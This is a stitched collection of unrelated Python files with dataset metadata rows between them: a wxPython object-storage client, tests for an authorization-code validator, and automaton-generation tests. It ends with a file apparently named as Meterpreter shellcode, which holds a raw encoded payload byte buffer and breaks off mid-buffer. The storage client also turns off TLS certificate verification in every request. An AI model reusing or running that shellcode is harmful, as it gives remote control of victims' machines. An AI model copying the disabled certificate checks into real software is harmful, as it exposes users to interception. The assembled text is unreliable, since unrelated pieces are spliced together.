self.textControl.AppendText(">Show Object List Success\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
self.textControl.AppendText("[Name]\t\t[Bytes]\t\t[Last_Modified]\r\n")
self.textControl.AppendText("--------------------------------------------------------------------------------------\r\n")
decoded = json.loads(bodyBuf.getvalue())
for i in decoded:
totalObject = totalObject + 1
self.textControl.AppendText("%s\t\t%s\t\t%s\r\n" %(i['name'], i['bytes'], i['last_modified']))
self.textControl.AppendText("\r\n")
self.textControl.AppendText("Tatal Object : %d\r\n" %totalObject)
headerBuf.close()
bodyBuf.close()
c.close()
def ObjectMeta(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
objectUrl = ""
textDialog = wx.TextEntryDialog(self, 'Enter a Object Name to Show', 'Show Object Metadata', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
objectUrl = textDialog.GetValue().strip()
objectUrl = objectUrl.encode('utf-8')
textDialog.Destroy()
if objectUrl == "":
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+objectUrl+"?format=json")
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200 or rtn == 204) :
wx.MessageBox('Show Object Metadata Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Show Object Metadata Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Show Object metadata Success\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
headerBuf.close()
bodyBuf.close()
c.close()
return
def UploadObject(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
dialog=wx.FileDialog(self, " Enter a Object Name to Upload", self.dirname, "", "*.*", wx.OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.filename=dialog.GetFilename()
self.dirname=dialog.GetDirectory()
try:
statinfo = os.stat(self.dirname+"/"+self.filename)
f=open(self.dirname+"/"+self.filename, "rb")
except os.error:
wx.MessageBox('File Open failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
dialog.Destroy()
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
#requestHeader = "X-AUth-Token: %s\r\nX-Delete-After: 86500\r\nContent-Length: %d\r\n" %(self.authToken, statinfo.st_size)
requestHeader = "X-AUth-Token: %s\r\nX-Delete-After: 86500" %(self.authToken)
#requestHeader = "X-AUth-Token: %s" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+self.filename.encode('utf-8'))
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.NOPROGRESS, False)
c.setopt(pycurl.PUT, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "PUT")
c.setopt(pycurl.INFILE, f)
c.setopt(pycurl.INFILESIZE, statinfo.st_size)
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.setopt(c.PROGRESSFUNCTION, progress)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
upspeed = c.getinfo(c.SPEED_UPLOAD)
totalTime = c.getinfo(c.TOTAL_TIME)
f.close
if not(rtn == 201 or rtn == 202) :
wx.MessageBox('Object Upload Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Object Upload Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Object Upload Successs\r\n")
self.textControl.AppendText("Upload Speed: %s\t\tTotalTime: %s\r\n\r\n" %(upspeed, totalTime))
headerBuf.close()
bodyBuf.close()
c.close()
return
def DownloadObject(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
downFileName = ""
textDialog = wx.TextEntryDialog(self, ' Enter a Object Name to Download ', 'Object Download', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
downFileName = textDialog.GetValue().strip()
downFileName = downFileName.encode('utf-8')
textDialog.Destroy()
if downFileName == "":
self.EmptyInput()
return
dialog=wx.FileDialog(self, " Enter a Object Name to Save", self.dirname, downFileName, "*.*", wx.SAVE)
if dialog.ShowModal() == wx.ID_OK:
self.filename=dialog.GetFilename()
self.dirname=dialog.GetDirectory()
try:
f=open(self.dirname+"/"+self.filename, "wb+")
except os.error:
wx.MessageBox('File Open failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
dialog.Destroy()
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+downFileName)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, True)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.NOPROGRESS, False)
#c.setopt(pycurl.BINARY_TRANSFER, False)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(pycurl.WRITEDATA, f)
c.setopt(c.WRITEFUNCTION, f.write)
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.PROGRESSFUNCTION, progress)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
downspeed = c.getinfo(c.SPEED_DOWNLOAD)
totalTime = c.getinfo(c.TOTAL_TIME)
f.close()
if not(rtn == 200 or rtn == 204) :
wx.MessageBox('Object Download Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Object Download Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Object Download Success\r\n")
self.textControl.AppendText("Download Speed: %s\t\tTotalTime: %s\r\n\r\n" %(downspeed, totalTime))
headerBuf.close()
bodyBuf.close()
c.close()
return
def CopyObject(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
dialog = DialogClass.dialogCopyObject(self, -1, 'Copy Object')
dialog.ShowModal()
dialog.Destroy()
if dialog.sourceFile == "" or dialog.destFile == "" :
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\nX-Copy-From: %s/%s\r\nContent-Length: 0\r\n\r\n" %(self.authToken, self.selectedContainer, dialog.sourceFile)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+dialog.destFile)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "PUT")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200 or rtn == 201) :
wx.MessageBox('File Copy Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Object Copy Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Object Copy Success\r\n")
self.textControl.AppendText("File Copied: %s -> %s\r\n\r\n" %(dialog.sourceFile, dialog.destFile))
headerBuf.close()
bodyBuf.close()
c.close()
return
def DeleteObject(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
objectUrl = ""
textDialog = wx.TextEntryDialog(self, ' Enter a Object Name to Delete', 'Object Delete', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
objectUrl = textDialog.GetValue().strip()
objectUrl = objectUrl.encode('utf-8')
textDialog.Destroy()
if objectUrl == "":
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+self.selectedContainer+"/"+objectUrl)
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 204) :
wx.MessageBox('Object Delete Failed' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Object Delete Failed\r\n")
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
self.textControl.AppendText(">Object Delete Success\r\n")
self.textControl.AppendText("File Deleted: %s\r\n\r\n" %objectUrl)
headerBuf.close()
bodyBuf.close()
c.close()
return
def DeleteContainerAll(self):
if self.authToken == "":
wx.MessageBox('Authentication has not been completed.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
if self.selectedContainer == "":
wx.MessageBox('Container has not been selected.' ,'Notices' ,wx.OK|wx.ICON_INFORMATION)
return
containerUrl = ""
textDialog = wx.TextEntryDialog(self, ' Enter a Container Name to Delete\r\n All Object in Container will be Delete', 'Container Delete', '', wx.OK|wx.CANCEL|wx.CENTRE)
if textDialog.ShowModal() == wx.ID_OK:
containerUrl = textDialog.GetValue().strip()
containerUrl = containerUrl.encode('utf-8')
textDialog.Destroy()
if containerUrl == "":
self.EmptyInput()
return
headerBuf = cStringIO.StringIO()
bodyBuf = cStringIO.StringIO()
requestHeader = "X-AUth-Token: %s\r\n\r\n" %(self.authToken)
c = pycurl.Curl()
c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl+"?format=json")
c.setopt(pycurl.SSL_VERIFYPEER, False)
c.setopt(pycurl.VERBOSE, False)
c.setopt(pycurl.TCP_NODELAY, True)
c.setopt(pycurl.HTTPHEADER, [requestHeader])
c.setopt(pycurl.CUSTOMREQUEST, "GET")
c.setopt(c.HEADERFUNCTION, headerBuf.write)
c.setopt(c.WRITEFUNCTION, bodyBuf.write)
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 200 or rtn == 204) :
wx.MessageBox('Container Delete Failed' ,'Notice' ,wx.OK|wx.ICON_INFORMATION)
self.textControl.SetDefaultStyle(wx.TextAttr(wx.RED))
self.textControl.AppendText(">Container Delete Failed : %d \r\n" %rtn)
self.textControl.AppendText(headerBuf.getvalue())
self.textControl.AppendText(bodyBuf.getvalue())
self.textControl.AppendText("\r\n\r\n")
self.textControl.SetDefaultStyle(wx.TextAttr(wx.BLACK))
else:
decoded = json.loads(bodyBuf.getvalue())
for i in decoded:
object = i['name']
object = object.encode('utf-8')
print self.storageUrl+"/"+containerUrl+"/"+object
c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl+"/"+object)
c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 204) :
self.textControl.AppendText("File Delete Failed: %s return[%d]\r\n" %(object, rtn))
else:
self.textControl.AppendText("File Deleted: %s return[%d] \r\n" %(object, rtn))
c.setopt(pycurl.URL, self.storageUrl+"/"+containerUrl)
c.setopt(pycurl.CUSTOMREQUEST, "DELETE")
c.perform()
rtn = c.getinfo(c.HTTP_CODE)
if not(rtn == 204 ) :
self.textControl.AppendText("Container Delete Failed: %s [%s]\r\n%s\r\n" %(containerUrl, rtn, bodyBuf.getvalue()))
else:
self.textControl.AppendText("Container Deleted: %s [%s]\r\n" %(containerUrl, rtn))
headerBuf.close()
bodyBuf.close()
c.close()
return
| 43.212682
| 184
| 0.559367
| 3,377
| 32,712
| 5.387622
| 0.066331
| 0.109652
| 0.14153
| 0.040178
| 0.876003
| 0.85814
| 0.832472
| 0.813455
| 0.795702
| 0.774321
| 0
| 0.005322
| 0.299248
| 32,712
| 756
| 185
| 43.269841
| 0.788378
| 0.031517
| 0
| 0.775128
| 0
| 0.005111
| 0.140276
| 0.025125
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.003407
| 0.010221
| null | null | 0.008518
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8dbecd9aff2be8395087262041a1354fff2ecb75
| 6,066
|
py
|
Python
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | 1
|
2020-04-05T23:54:56.000Z
|
2020-04-05T23:54:56.000Z
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | 1
|
2019-10-01T20:48:21.000Z
|
2019-10-01T20:48:50.000Z
|
test/test_authorization_code_validator.py
|
danirod/dummyauth
|
f21ddda21dd3eed202d36399419f6e77d3a438ae
|
[
"0BSD"
] | null | null | null |
import httpretty
import sure
from dummyauth.spider import AuthorizationCodeValidator
from unittest import TestCase
class AuthorizationCodeValidatorTestCase(TestCase):
@httpretty.httprettified
def test_spider_handles_valid_requests(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
validator = AuthorizationCodeValidator(**validator_params)
self.assertTrue(validator.valid)
@httpretty.httprettified
def test_spider_handles_valid_profile_url(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
validator = AuthorizationCodeValidator(**validator_params)
validator.profile_url.should.equal('http://johndoe.example.com/')
@httpretty.httprettified
def test_spider_handles_invalid_requests(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"error": "invalid_request"}',
status=400)
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
validator = AuthorizationCodeValidator(**validator_params)
self.assertFalse(validator.valid)
@httpretty.httprettified
def test_spider_handles_invalid_request_code(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"error": "invalid_request"}',
status=400)
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
validator = AuthorizationCodeValidator(**validator_params)
validator.error.should.equal('invalid_request')
@httpretty.httprettified
def test_spider_sends_appropiate_request(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
AuthorizationCodeValidator(**validator_params).valid
httpretty.has_request().should.be(True)
@httpretty.httprettified
def test_spider_sends_appropiate_code(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
AuthorizationCodeValidator(**validator_params).valid
payload = httpretty.last_request().parsed_body
payload['code'][0].should.equal('deadbeef')
@httpretty.httprettified
def test_spider_sends_appropiate_client_id(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
AuthorizationCodeValidator(**validator_params).valid
payload = httpretty.last_request().parsed_body
payload['client_id'][0].should.equal('http://client.example.com/')
@httpretty.httprettified
def test_spider_sends_appropiate_redirect_uri(self):
httpretty.register_uri(httpretty.POST, 'http://auth.example.com/login',
adding_headers={'content-type': 'application/json'},
body='{"me": "http://johndoe.example.com/"}')
validator_params={
'authorization_endpoint': 'http://auth.example.com/login',
'code': 'deadbeef',
'client_id': 'http://client.example.com/',
'redirect_uri': 'http://client.example.com/callback',
}
AuthorizationCodeValidator(**validator_params).valid
payload = httpretty.last_request().parsed_body
payload['redirect_uri'][0].should.equal('http://client.example.com/callback')
| 48.919355
| 85
| 0.600725
| 566
| 6,066
| 6.25265
| 0.114841
| 0.115852
| 0.086465
| 0.101724
| 0.901385
| 0.899124
| 0.899124
| 0.791184
| 0.759537
| 0.759537
| 0
| 0.001997
| 0.257171
| 6,066
| 123
| 86
| 49.317073
| 0.7834
| 0
| 0
| 0.745614
| 0
| 0
| 0.333168
| 0.029014
| 0
| 0
| 0
| 0
| 0.017544
| 1
| 0.070175
| false
| 0
| 0.035088
| 0
| 0.114035
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c04db2f5adc13767d9fcc40cddbd980f094782f
| 3,471
|
py
|
Python
|
test/automaton_generation/test_universal_automaton_generation.py
|
rominf/pyffs
|
6c805fbfd7771727138b169b32484b53c0b0fad1
|
[
"MIT"
] | 21
|
2018-07-17T13:21:11.000Z
|
2022-03-07T03:00:37.000Z
|
test/automaton_generation/test_universal_automaton_generation.py
|
rominf/pyffs
|
6c805fbfd7771727138b169b32484b53c0b0fad1
|
[
"MIT"
] | 10
|
2016-09-23T20:30:18.000Z
|
2021-03-07T12:56:56.000Z
|
test/automaton_generation/test_universal_automaton_generation.py
|
antoinewdg/pyffs
|
6ac2b6cac67422cbfd34ad0896d6faf35be9ccb9
|
[
"MIT"
] | 3
|
2018-08-21T12:08:36.000Z
|
2020-11-12T19:32:54.000Z
|
from pyffs.core import State
from pyffs.automaton_generation import generate_universal_automaton
def test_generate_automaton_0():
expected = [
[State(-1, 0), State(-1, 0), State(0, 1)],
]
automaton = generate_universal_automaton(0)
assert automaton.matrix == expected
assert automaton.bit_vectors == [(), (0,), (1,)]
assert automaton.max_i_minus_e == [0]
def test_generate_automaton_1():
expected = [
[State(id=1, min_boundary=0),
State(id=2, min_boundary=0),
State(id=0, min_boundary=1),
State(id=2, min_boundary=0),
State(id=4, min_boundary=0),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=2, min_boundary=0),
State(id=2, min_boundary=0),
State(id=4, min_boundary=0),
State(id=4, min_boundary=0),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1),
State(id=0, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=2, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1)],
[State(id=-1, min_boundary=0),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=2),
State(id=1, min_boundary=1),
State(id=2, min_boundary=1),
State(id=-1, min_boundary=0),
State(id=1, min_boundary=3),
State(id=1, min_boundary=2),
State(id=2, min_boundary=2),
State(id=1, min_boundary=1),
State(id=3, min_boundary=1),
State(id=2, min_boundary=1),
State(id=4, min_boundary=1)]
]
automaton = generate_universal_automaton(1)
assert automaton.matrix == expected
assert automaton.max_i_minus_e == [0, -1, 0, 1, 1]
| 34.71
| 67
| 0.570153
| 526
| 3,471
| 3.581749
| 0.053232
| 0.278662
| 0.216561
| 0.297771
| 0.900212
| 0.855096
| 0.816348
| 0.788747
| 0.780255
| 0.780255
| 0
| 0.066325
| 0.270239
| 3,471
| 99
| 68
| 35.060606
| 0.677458
| 0
| 0
| 0.791209
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054945
| 1
| 0.021978
| false
| 0
| 0.021978
| 0
| 0.043956
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
5c29b26d3c9dc46bad24f09a2178d64f46afa8cf
| 3,733
|
py
|
Python
|
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
meterpreter/windows_x86/scode.py
|
cobranail/redteam
|
a21091ac0aef289b61dd05771fff7296fb7c4e7e
|
[
"MIT"
] | null | null | null |
import ctypes
import sys
from ctypes import *
buf=b"\x48\x31\xc9\x48\x81\xe9\xb1\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xf8\x3d\x59\x54\x46\x6d\x59\x99\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x04\x75\xda\xb0\xb6\x85\x95\x99\xf8\x3d\x18\x05\x07\x3d\x0b\xc8\xae\x75\x68\x86\x23\x25\xd2\xcb\x98\x75\xd2\x06\x5e\x25\xd2\xcb\xd8\x75\xd2\x26\x16\x25\x56\x2e\xb2\x77\x14\x65\x8f\x25\x68\x59\x54\x01\x38\x28\x44\x41\x79\xd8\x39\xf4\x54\x15\x47\xac\xbb\x74\xaa\x7c\x08\x1c\xcd\x3f\x79\x12\xba\x01\x11\x55\x96\x0b\xd8\xe1\xe0\x36\x5b\x5b\xc3\x1f\x59\x99\xf8\xb6\xd9\xdc\x46\x6d\x59\xd1\x7d\xfd\x2d\x33\x0e\x6c\x89\xc9\x73\x75\x41\x10\xcd\x2d\x79\xd0\xf9\xed\xba\x02\x0e\x92\x90\xd8\x73\x09\xd1\x1c\x47\xbb\x14\xa8\x31\x75\x68\x94\xea\x2c\x98\x50\xf5\x7c\x58\x95\x7e\x8d\x2c\x68\xb4\x3e\x15\x70\x4e\x28\x60\x48\x8d\xe5\x01\x10\xcd\x2d\x7d\xd0\xf9\xed\x3f\x15\xcd\x61\x11\xdd\x73\x7d\x45\x1d\x47\xbd\x18\x12\xfc\xb5\x11\x55\x96\x2c\x01\xd8\xa0\x63\x00\x0e\x07\x35\x18\xc0\xb9\x67\x11\xd7\xaa\x4d\x18\xcb\x07\xdd\x01\x15\x1f\x37\x11\x12\xea\xd4\x12\xab\xb9\x92\x04\xd0\x46\x4a\x2a\x66\x19\x5e\x6b\x99\xf8\x7c\x0f\x1d\xcf\x8b\x11\x18\x14\x9d\x58\x54\x46\x24\xd0\x7c\xb0\x0c\x99\x04\x16\x24\xe5\x9b\xf8\x1d\xa9\x54\x46\x6d\x59\xd8\xac\x74\xd0\xb0\x0a\xe4\xa8\xd8\x42\x71\x2e\x72\x41\x92\x8c\xd5\x71\xd7\x31\x55\x47\x6d\x59\xc0\xb9\x87\x70\xd4\x2d\x6d\xa6\x4c\x92\x3f\x00\x04\x16\x20\x68\x50\xb5\x0c\x99\x1c\xb9\xad\x11\x10\x3a\x7c\xe3\xbe\x49\xb2\xb9\x66\x2d\x75\xd0\x93\x2c\x7d\x18\xc1\xb4\xb4\xbb\x1c\xcf\x94\x18\x23\x3a\xe6\x6e\x33\xb9\xb8\x11\xa8\x2a\x75\xd0\xad\x07\xd7\xee\x70\xc0\xc2\xa6\x81\x0b\x5c\x99\xd1\xc9\xef\x11\xdd\xbf\x2c\xe3\xed\x14\x06\xb8\xab\x93\x25\xd0\x60\xb0\xb4\x9e\x15\xfc\x18\x37\xd4\x99\xc2\x8c\x1c\xc7\xa9\xe9\x9b\xf8\x3d\x11\xd7\xaa\x7d\x11\x10\x1a\x70\x68\x9d\x2c\x69\x18\xc1\xb0\xb4\xa0\x15\xfc\x6f\x80\x51\xa7\xc2\x8c\x1c\xc5\xa9\x79\xc7\x71\xcb\xd8\xa2\x74\xd6\x41\x2f\xb4\xb0\xc7\x54\x47\x6d\x59\xf3\xb8\x7c\x00\x3c\x46\x7d\x59\x99\xb9\x65\x11\xdd\xb4\x25\x68\x50\xb9\x87\x01\xf0\x15\x88\xa6\x4c\xb0\xb0\xc1\x54\x47\x6d\x59\xd0\x71\xe2\x0a\x02\x16\x20\x68\x50\xb1\xb4\xa9\x1c\xcf\xb7\x11\x10\x01\x7c\xe3\x56\x9f\xa5\x06\x66\x2d\x75\xda\x90\x66\x25\x58\x5a\xb0\x14\x9f\x21\xa6\x24\xd0\x67\xa7\x64\x18\x0d\x07\x3b\xb1\x89\xf8\x3d\x59\x79\x16\xf6\x59\xa1\xb0\xe2\xd3\xf9\xc5\xba\x57\x09\x5d\xf3\xde\x0a\x0e\x5c\x99\xd0\x71\xc5\xf3\xaa\x86\x18\xa2\xd1\xc9\xe6\x18\x56\x5a